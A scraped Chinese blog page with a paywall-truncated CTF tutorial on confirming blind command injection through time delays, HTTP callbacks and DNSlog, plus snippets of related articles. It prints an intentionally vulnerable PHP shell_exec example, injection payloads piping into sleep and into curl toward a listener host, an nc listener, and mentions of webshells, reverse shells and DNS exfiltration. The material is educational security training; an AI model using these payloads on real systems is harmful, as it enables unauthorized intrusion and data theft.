命令执行无回显的判断方法及DNSLOG相关例题的讲解

最新推荐文章于 2024-05-15 02:36:49 发布
最新推荐文章于 2024-05-15 02:36:49 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: CTF 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blue_fantasy/article/details/122403330
版权

命令无回显的情况

判断方法

1.延时

2.HTTP请求

3.DNS请求

<?php
highlight_file(__FILE__);
shell_exec($_GET[1]);
?>

(1)通过传入1=ls|sleep(3)

页面加载3秒左右才显示来证明注入语句带入成功

传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000

(2)通过提前nc监听,利用curl命令进行信息获取

(3)提前注册ceye.io平台获取一个域名,该域名下的子域名被请求的信息都会被记录到平台上

其中DNS请求的使用范围多于HTTP请求,常用利用方式

写shell(直

最低0.47元/天 解锁文章
blue_fantasy
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
学习远程命令执行漏洞笔记
qq_56426046的博客
08-30 1806
以上是我学习完远程命令执行漏洞的学习心得和笔记,望自己能坚持下去。
网络安全笔记
龙卷风摧毁停车场
10-09 3579
Linux基础 cd ../.. 返回上两级目录 cd . 返回个人主目录 cd ~user1 pwd 显示工作路径 ls -F 查看目录中的文件 -l 显示文件目录的详细信息 -a 显示隐藏文件 ls /bin 显示bin目录下的问价 tree 显示由根目录开始的树形结构 lstree mkdir -p /tmp/dir1/dir2 创建一个目录树 rm -f file1 删除一个文件 rm -rf dir1 递归删除dir1下的所有文件 rmdir dir1 删除目...
CTF入门web篇18命令执行回显判断方法dnslog相关例题_ctf web题传参数后没有回显
最新发布
m0_60707685的博客
05-15 424
例:我们在公网机上可以通过”nc -lv 端口号”来监听该端口,当目标机”curl 公网机ip:端口号”的时候,公网机的该端口可以发现有http请求过来。目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到http请求就代表命令执行命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。通过是否延时来判断该条命令是否有执行,有延时则代表命令执行。(”sleep 3”表示延时3秒)
dnslog使用方法
qq_36232967的博客
06-20 1555
在实际使用中,DNSLog 可以用于获取恶意软件的 C&C 服务器、验证域名接入情况、检测恶意软件的行为等。请注意,使用 DNSLog 应该遵循合法和道德的原则,确保仅在合法且授权的环境中使用。此外,具体的 DNSLog 使用方法可能会根据所选择的平台而有所不同,你应该参考平台提供的文档和指南以获得更详细的操作说明。设置 DNS 配置:将你要测试的系统或应用程序的 DNS 配置中的某个域名或主机名设置为你创建的域名,例如将。创建域名:在注册的平台上,你可以创建一个自定义的域名,例如。
[CTF]命令执行回显利用
cosmoslin的博客
02-21 7465
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
带外攻击(OOB)RCE无回显思路总结详解
qq_71467825的博客
06-23 1275
向服务器提交一个payload,而服务器响应给我们相关的response信息,大家都叫他带内攻击,这些理论的东西,我们简单理解就好,这里我们就理解成。传输层协议使用带外数据(out-of-band,OOB)来发送一些重要的数据,如果通信一方有重要的数据需要通知对方时,协议能够将这些数据快速地发送到对方。为了发送这些数据,协议一般不使用与普通数据相同的通道,而是使用另外的通道。linux系统的套接字机制支持低层协议发送和接受带外数据。但是TCP协议没有真正意义上的带外数据。
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
Python3 执行系统命令并获取实时回显功能
01-01
下面先给大家介绍下Python3 执行系统命令并获取实时回显 最近在改造一些打包的逻辑,原来在 Windows 下是基于批处理制作的,由于批处理用起来不是很方便,一些实时的计算基本无法胜任,所以转向 Python3。但在以前...
语言执行DOS命令回显模块
08-30
.子程序 CMD命令, 文本型, 公开, 写入要执行的DOS语句,类型:文本型 .参数 命令, 文本型 执行DOS命令并以文本型返回结果
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
091-从无回显命令执行到getshell的渗透测试.pdf
反弹shell&数据不回显带外查询&pikaqiu靶场搭建
fencecat的博客
03-04 1176
解决无图形化:当我们想下载一个文件时,通常是通过浏览器的一个链接直接访问网站点击下载的,但是在实际的安全测试中,我们获取的权限只是一个执行命令的窗口,无法获取图形化界面,因此,我们就需要命令来实现文件的上传和下载。比如,当我们想上传一个文件到对方的服务器,我们应该想办法用命令让对方执行下载操作,而不可能直接打开对方的服务器的浏览器去下载,因为我们没有获取这样的权限,只能通过黑窗窗输入命令尝试。Windows->| & || &&Linux->; | || & && ``(特有``和;)
【网络安全】命令执行漏洞
边缘拼命划水的小陈
04-19 1355
等函数用来执行系统命令。当黑客能控制这些函数的参数时,就可以讲恶意的系统命令拼接到正常的命令中,就会命令执行攻击,这就是命令执行漏洞。应用程序中有时候需要调用一些执行系统命令的函数,在php中常见的为。使用webshell工具连接。linux 操作系统。
命令执行回显判断方法dnslog相关例题讲解
DKPT的博客
11-21 298
命令回显的情况。
浅谈PHP回显命令执行的利用
qwzf
08-18 2101
文章目录0x00 前言0x01 判断方法1、审计代码2、延时3、HTTP请求4、DNS请求0x02 利用方法1、执行命令2、写shell(直接写入或外部下载shell)3、通过dnslog带出数据4、反弹shell5、msf反向回连6、使用nc7、curl上传文件读取源码0x03 后记 0x00 前言 命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行。确定命令可以执行,然后进行无回显命令执行的绕过与利用 0x01 判断方法 1、审计代码 审计代码,根据代码逻辑判断 2、延时 ip=|ls|sl
dnslog盲打学习
..
02-27 3078
前言 在渗透或者ctf中,我们可能会遇到一些没有回显的漏洞,这个时候可以通过dnslog判断存不存在漏洞,并且得到漏洞执行的结果。 什么是dnslog dns是在我们输入一个域名如A.com时,会通过DNS把域名解析为ip,靠着dns解析到真正的ip地址127.0.0.1,这样子才能访问127.0.0.1服务器上的相应服务。 那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。 可以通过这篇文章好好
最新渗透测试面试题合集
网络安全
05-17 1万+
⽹上整理的渗透测试⾯试问题⼤全,有些 HW ⾯试的题,已经收集好了,提供给⼤家。现在就是毕业季节,希望各位都能找到好工作。 渗透篇 1、介绍⼀下⾃认为有趣的挖洞经历 挖洞也有分很多种类型,⼀种是以渗透、⼀种是以找漏洞为主,如果是前者会想各种办法获取权限继⽽获取想要的的东⻄完成渗透⽬标,这类跟 HW 类似,⽬标各种漏洞不算,要有 Shell,服务器权限才给分,这才是最接近实战渗透,跟某部⻔有合作的话也是属于这种打击⽹络犯罪获得权限、传销数据、组织架构,服务器权限、等…
CTF入门web篇18命令执行回显判断方法dnslog相关例题
anquanniu的博客
10-19 4488
命令执行判断 命令执行可能会存在命令执行完没有回显,首先要判断命令是否有执行,可以通过三种方式来判断:延时、HTTP请求、DNS请求。 1、 延时 无延时无回显 有延时无回显 通过是否延时来判断该条命令是否有执行,有延时则代表命令执行。(”sleep 3”表示延时3秒) 2、 HTTP请求 目标机通过向公网可通信的机子发起http请求,而这个公网可通信的机子是我们可控的,则当该公网机子收到h...
DNSLog使用方法
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
CURL执行之后无任何返回内容解决方法
热门推荐
chengliu2230的博客
09-18 1万+
1.https证书验证问题 // 设置传输选项 // https请求 不验证证书 其实只用这个就可以了 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //https请求 不验证HOST curl_setop...
如果使用 payload 去 ping dnslog 外带执行一些系统命令入 whoami 如果 dnslog 没有回显你觉得是什么原因?
05-21
如果使用 payload 去 ping dnslog 外带执行一些系统命令入 whoami 如果 dnslog 没有回显,可能有以下一些原因: 1. 防火墙阻止了发出的 ICMP 包或者 DNS 请求,导致无法连接到 DNSLog。 2. DNSLog 服务器已经宕机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值